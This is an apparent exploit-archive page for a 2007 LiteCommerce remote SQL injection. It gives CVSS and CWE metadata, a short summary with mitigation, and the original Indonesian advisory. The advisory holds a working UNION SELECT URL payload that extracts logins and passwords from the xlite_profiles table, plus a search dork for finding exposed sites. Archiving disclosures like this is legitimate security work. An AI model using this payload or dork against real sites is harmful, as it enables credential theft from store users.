header-logo
Suggest Exploit
vendor:
LiteCommerce
by:
k1tk4t
5.5
CVSS
MEDIUM
Remote SQL Injection
89
CWE
Product Name: LiteCommerce
Affected Version From: LiteCommerce 2004
Affected Version To: LiteCommerce not specified
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

litecommerce Copyright © 2004 – Remote SQL Injection

This exploit allows an attacker to perform a remote SQL injection attack on LiteCommerce. By injecting a specially crafted query, the attacker can retrieve the login and password information from the xlite_profiles table. The exploit may not work on the latest version of LiteCommerce as it does not generate an error message.

Mitigation:

To mitigate this vulnerability, it is recommended to update LiteCommerce to the latest version.
Source

Exploit-DB raw data:

########################################################################
# litecommerce Copyright © 2004 - Remote SQL Injection
# Vendor        : http://www.litecommerce.com/
# Found By      : k1tk4t - k1tk4t[4t]newhack.org
# Location      : Indonesia   --  #newhack[dot]org @irc.dal.net
# Dork          : Powered by LiteCommerce
########################################################################
POC;

http://localhost/cart.php?target=category&category_id=9999)union/**/select/**/concat(login,'-',password)/**/from/**/xlite_profiles/*

jika exploit ini berhasil, anda akan melihat pesan error pada halaman, pesan error yang berisikan informasi kesalahan SQL
sekaligus memberikan informasi "login" dan "password" yang berada pada table xlite_profiles
exploit ini kemungkinan tidak berhasil pada litecommerce terbaru[tidak ada pesan error]
########################################################################
Terimakasih untuk;
str0ke
arioo[nyubicrew] yang telah memberikan link tersebut
xoron,y3dips,mathdule,iFX,x-ace,nyubi,selikoer,k1ngk0ng
dan semua temen2 komunitas security&hacking
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&security Indonesia
cintailah bahasa Indonesia

# milw0rm.com [2007-08-21]

Navigation

Suggest Exploit

Services By CQR